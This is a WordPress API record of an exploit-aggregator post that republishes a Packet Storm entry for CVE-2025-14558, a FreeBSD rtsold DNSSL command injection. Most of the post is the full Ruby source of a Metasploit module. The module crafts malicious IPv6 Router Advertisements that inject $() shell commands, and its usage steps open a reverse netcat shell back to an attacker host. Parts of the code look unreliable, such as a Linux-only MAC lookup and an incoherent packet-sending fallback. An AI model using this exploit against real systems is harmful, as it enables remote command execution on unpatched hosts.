{"id":37902,"date":"2026-01-28T12:45:56","date_gmt":"2026-01-28T12:45:56","guid":{"rendered":"http:\/\/localhost\/?p=37902"},"modified":"2026-01-28T12:45:56","modified_gmt":"2026-01-28T12:45:56","slug":"freebsd-15x-rtsold-dnssl-command-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=37902","title":{"rendered":"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:51:20&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a command injection vulnerability in the FreeBSD rtsold daemon related to the handling of DNSSL DNS Search List options in IPv6 Router Advertisements. Due to improper validation of domain names, attacker-controlled DNSSL&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214487&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-14558&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : FreeBSD 15.x rtsold DNSSL Command Injection                                                                                 |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.freebsd.org\/                                                                                                    |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/213577\/ \\u0026 \\tCVE-2025-14558\\n    \\n    [+] Summary    : This Metasploit module targets a command injection vulnerability in the FreeBSD rtsold daemon related to the handling of DNSSL (DNS Search List) options in IPv6 Router Advertisements. \\n                     Due to improper validation of domain names, attacker-controlled DNSSL values can inject shell commands via $() substitution when processed by the resolvconf script. \\n                     Successful exploitation requires Layer 2 adjacency and ACCEPT_RTADV enabled on the target, and may result in remote command execution on vulnerable FreeBSD systems prior to the official patches.\\n    \\n    [+] Usage :\\n    \\n    msfconsole\\n    msf\\u003e use exploit\/bsd\/ipv6\/rtsold_dnssl_rce\\n    msf\\u003e set INTERFACE eth0\\n    msf\\u003e set PAYLOAD cmd\/unix\/reverse_netcat\\n    msf\\u003e set LHOST 192.168.1.100\\n    msf\\u003e set LPORT 4444\\n    msf\\u003e exploit\\n    \\n    [+] POC :\\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::Raw\\n      include Msf::Exploit::Remote::Ipv6\\n      include Msf::Exploit::CmdStager\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;FreeBSD rtsold DNSSL Command Injection&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits CVE-2025-14558, a command injection vulnerability in\\n            FreeBSD&#8217;s rtsold daemon. The vulnerability exists in the processing of\\n            DNSSL (DNS Search List) options in IPv6 Router Advertisements.\\n            \\n            rtsold processes DNSSL options without validating domain names for shell\\n            metacharacters. The decoded domains are passed to resolvconf(8), a shell\\n            script that uses unquoted variable expansion, enabling command injection\\n            via $() substitution.\\n            \\n            This exploit requires layer 2 adjacency to the target and the target must\\n            be running rtsold with ACCEPT_RTADV enabled.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [&#8216;indoushka&#8217;],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2025-14558&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/security.FreeBSD.org\/advisories\/FreeBSD-SA-25:12.rtsold.asc&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/JohannesLks\/CVE-2025-14558&#8217;]\\n          ],\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-12-16&#8217;,\\n          &#8216;Platform&#8217;       =\\u003e &#8216;bsd&#8217;,\\n          &#8216;Arch&#8217;           =\\u003e ARCH_CMD,\\n          &#8216;Payload&#8217;        =\\u003e {\\n            &#8216;BadChars&#8217; =\\u003e &#8221;,\\n            &#8216;Compat&#8217;   =\\u003e {\\n              &#8216;PayloadType&#8217; =\\u003e &#8216;cmd&#8217;,\\n              &#8216;RequiredCmd&#8217; =\\u003e &#8216;generic&#8217;\\n            }\\n          },\\n          &#8216;Targets&#8217;        =\\u003e [\\n            [&#8216;FreeBSD 13.x-15.x (before patches)&#8217;, {}]\\n          ],\\n          &#8216;DefaultTarget&#8217;  =\\u003e 0,\\n          &#8216;Notes&#8217;          =\\u003e {\\n            &#8216;Stability&#8217;   =\\u003e [CRASH_SAFE],\\n            &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n            &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n          }\\n        ))\\n    \\n        register_options([\\n          OptString.new(&#8216;INTERFACE&#8217;, [true, &#8216;Network interface to use&#8217;, &#8216;eth0&#8217;]),\\n          OptInt.new(&#8216;COUNT&#8217;, [true, &#8216;Number of RA packets to send&#8217;, 3]),\\n          OptInt.new(&#8216;ROUTER_LIFETIME&#8217;, [true, &#8216;Router lifetime in seconds&#8217;, 1800]),\\n          OptString.new(&#8216;SOURCE_MAC&#8217;, [false, &#8216;Source MAC address (defaults to interface MAC)&#8217;]),\\n          OptString.new(&#8216;SOURCE_IPV6&#8217;, [false, &#8216;Source IPv6 address&#8217;, &#8216;fe80::1&#8217;])\\n        ])\\n    \\n        deregister_options(&#8216;RHOSTS&#8217;, &#8216;RPORT&#8217;)\\n      end\\n    \\n      def check\\n    \\n        Exploit::CheckCode::Unknown\\n      end\\n    \\n      def encode_domain(name)\\n        result = \\&#8221;\\&#8221;\\n        name.split(\\&#8221;.\\&#8221;).each do |label|\\n          next if label.empty?\\n          data = label\\n          result \\u003c\\u003c [data.length].pack(&#8216;C&#8217;) + data\\n        end\\n        result \\u003c\\u003c \\&#8221;\\\\x00\\&#8221;\\n      end\\n    \\n      def encode_payload(cmd)\\n        payload = \\&#8221;$(#{cmd})\\&#8221;\\n        \\n        if payload.length \\u003e 63\\n          result = \\&#8221;\\&#8221;\\n          while !payload.empty?\\n            chunk = payload.slice!(0, 63)\\n            result \\u003c\\u003c [chunk.length].pack(&#8216;C&#8217;) + chunk\\n          end\\n          result \\u003c\\u003c \\&#8221;\\\\x00\\&#8221;\\n        else\\n          [payload.length].pack(&#8216;C&#8217;) + payload + \\&#8221;\\\\x00\\&#8221;\\n        end\\n      end\\n    \\n      def build_dnssl_option(cmd, lifetime = 0xFFFFFFFF)\\n        data = encode_domain(\\&#8221;x.local\\&#8221;) + encode_payload(cmd)\\n    \\n        pad_len = (8 &#8211; (data.length + 8) % 8) % 8\\n        data \\u003c\\u003c \\&#8221;\\\\x00\\&#8221; * pad_len\\n    \\n        length = (8 + data.length) \/ 8\\n        \\n        dnssl = [\\n          31,             # Type: DNSSL (31)\\n          length,         # Length\\n          0,              # Reserved\\n          lifetime        # Lifetime\\n        ].pack(&#8216;CCnN&#8217;)\\n        \\n        dnssl + data\\n      end\\n    \\n      def build_router_advertisement\\n        src_mac = datastore[&#8216;SOURCE_MAC&#8217;]\\n        src_mac ||= get_mac(datastore[&#8216;INTERFACE&#8217;])\\n    \\n        eth = PacketFu::EthPacket.new\\n        eth.eth_saddr = src_mac\\n        eth.eth_daddr = \\&#8221;33:33:00:00:00:01\\&#8221;  # All-nodes multicast\\n        \\n        ipv6 = PacketFu::IPv6Packet.new\\n        ipv6.ipv6_hop = 255\\n        ipv6.ipv6_saddr = datastore[&#8216;SOURCE_IPV6&#8217;]\\n        ipv6.ipv6_daddr = \\&#8221;ff02::1\\&#8221;  # All-nodes multicast\\n        \\n     \\n        ra_header = [\\n          134,    # Type: Router Advertisement\\n          0,      # Code\\n          0,      # Checksum (will be calculated later)\\n          64,     # Cur Hop Limit\\n          0,      # Flags (M=0, O=1)\\n          1800    # Router Lifetime\\n        ].pack(&#8216;CCnCCn&#8217;)\\n    \\n        slaac_opt = [\\n          1,      # Type: Source Link-Layer Address\\n          1,      # Length in 8-octet units\\n          src_mac.gsub(&#8216;:&#8217;, &#8221;).scan(\/..\/).map { |x| x.hex }\\n        ].flatten.pack(&#8216;CCa6&#8217;)\\n    \\n        prefix_opt = [\\n          3,      # Type: Prefix Information\\n          4,      # Length in 8-octet units\\n          64,     # Prefix Length\\n          0x80,   # Flags (L=1, A=1)\\n          0,      # Valid Lifetime\\n          0,      # Preferred Lifetime\\n          0,      # Reserved\\n          # Prefix: 2001:db8::\\n          0x20, 0x01, 0x0d, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0\\n        ].pack(&#8216;CCCCNNNa16&#8217;)\\n    \\n        dnssl_opt = build_dnssl_option(payload.encoded)\\n    \\n        icmp_payload = ra_header + slaac_opt + prefix_opt + dnssl_opt\\n    \\n        checksum = ipv6_checksum(ipv6, icmp_payload)\\n        icmp_payload[2, 2] = [checksum].pack(&#8216;n&#8217;)\\n    \\n        eth.body = ipv6.to_s + icmp_payload\\n        eth\\n      end\\n    \\n      def ipv6_checksum(ipv6_packet, payload)\\n    \\n        pseudo_header = [\\n          ipv6_packet.ipv6_saddr.split(&#8216;:&#8217;).map { |x| x.hex }.pack(&#8216;n*&#8217;),\\n          ipv6_packet.ipv6_daddr.split(&#8216;:&#8217;).map { |x| x.hex }.pack(&#8216;n*&#8217;),\\n          payload.length,\\n          0,\\n          58  # ICMPv6 protocol number\\n        ].pack(&#8216;a16a16NNn&#8217;)\\n        \\n        sum = 0\\n        (pseudo_header + payload).unpack(&#8216;n*&#8217;).each do |word|\\n          sum += word\\n        end\\n        \\n        while sum \\u003e 0xffff\\n          sum = (sum \\u0026 0xffff) + (sum \\u003e\\u003e 16)\\n        end\\n        \\n        ~sum \\u0026 0xffff\\n      end\\n    \\n      def get_mac(interface)\\n    \\n        mac = nil\\n        File.open(\\&#8221;\/sys\/class\/net\/#{interface}\/address\\&#8221;, \\&#8221;r\\&#8221;) do |f|\\n          mac = f.read.strip\\n        end\\n        mac\\n      rescue\\n        nil\\n      end\\n    \\n      def exploit\\n        print_status(\\&#8221;Building malicious Router Advertisement&#8230;\\&#8221;)\\n        packet = build_router_advertisement\\n        \\n        print_status(\\&#8221;Sending #{datastore[&#8216;COUNT&#8217;]} RA packets via #{datastore[&#8216;INTERFACE&#8217;]}&#8230;\\&#8221;)\\n        \\n        datastore[&#8216;COUNT&#8217;].times do |i|\\n          begin\\n            send_packet(packet, datastore[&#8216;INTERFACE&#8217;])\\n            print_good(\\&#8221;Sent RA packet #{i + 1}\/#{datastore[&#8216;COUNT&#8217;]}\\&#8221;)\\n            sleep 1 if i \\u003c datastore[&#8216;COUNT&#8217;] &#8211; 1\\n          rescue =\\u003e e\\n            print_error(\\&#8221;Failed to send packet #{i + 1}: #{e.message}\\&#8221;)\\n          end\\n        end\\n        \\n        print_status(\\&#8221;Exploit complete. Check for session.\\&#8221;)\\n      end\\n    \\n      def send_packet(packet, interface)\\n     \\n        pcap = PCAPRUB::Pcap.open_live(interface, 65535, true, 0)\\n        pcap.inject(packet.to_s)\\n        pcap.close\\n      rescue LoadError\\n    \\n        system(\\&#8221;echo &#8216;#{packet.to_s.unpack(&#8216;H*&#8217;).first}&#8217; | xxd -r -p | sudo ip -6 neigh add ff02::1 dev #{interface} nud permanent\\&#8221;)\\n      end\\n    end\\n    \\t\\n    Greetings to :============================================================\\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n    ==========================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214487&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214487\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:51:20&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a command injection vulnerability in the FreeBSD rtsold daemon related to the handling of DNSSL DNS Search List options in IPv6&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-37902","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=37902\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:51:20&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a command injection vulnerability in the FreeBSD rtsold daemon related to the handling of DNSSL DNS Search List options in IPv6...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=37902\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-28T12:45:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487\",\"datePublished\":\"2026-01-28T12:45:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902\"},\"wordCount\":1347,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37902#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902\",\"name\":\"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-28T12:45:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37902\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37902#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=37902","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:51:20&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a command injection vulnerability in the FreeBSD rtsold daemon related to the handling of DNSSL DNS Search List options in IPv6...","og_url":"https:\/\/zero.redgem.net\/?p=37902","og_site_name":"zero redgem","article_published_time":"2026-01-28T12:45:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=37902#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=37902"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487","datePublished":"2026-01-28T12:45:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=37902"},"wordCount":1347,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=37902#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=37902","url":"https:\/\/zero.redgem.net\/?p=37902","name":"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-28T12:45:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=37902#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=37902"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=37902#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 FreeBSD 15.x rtsold DNSSL Command Injection_PACKETSTORM:214487"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37902","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37902"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37902\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37902"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=37902"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=37902"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}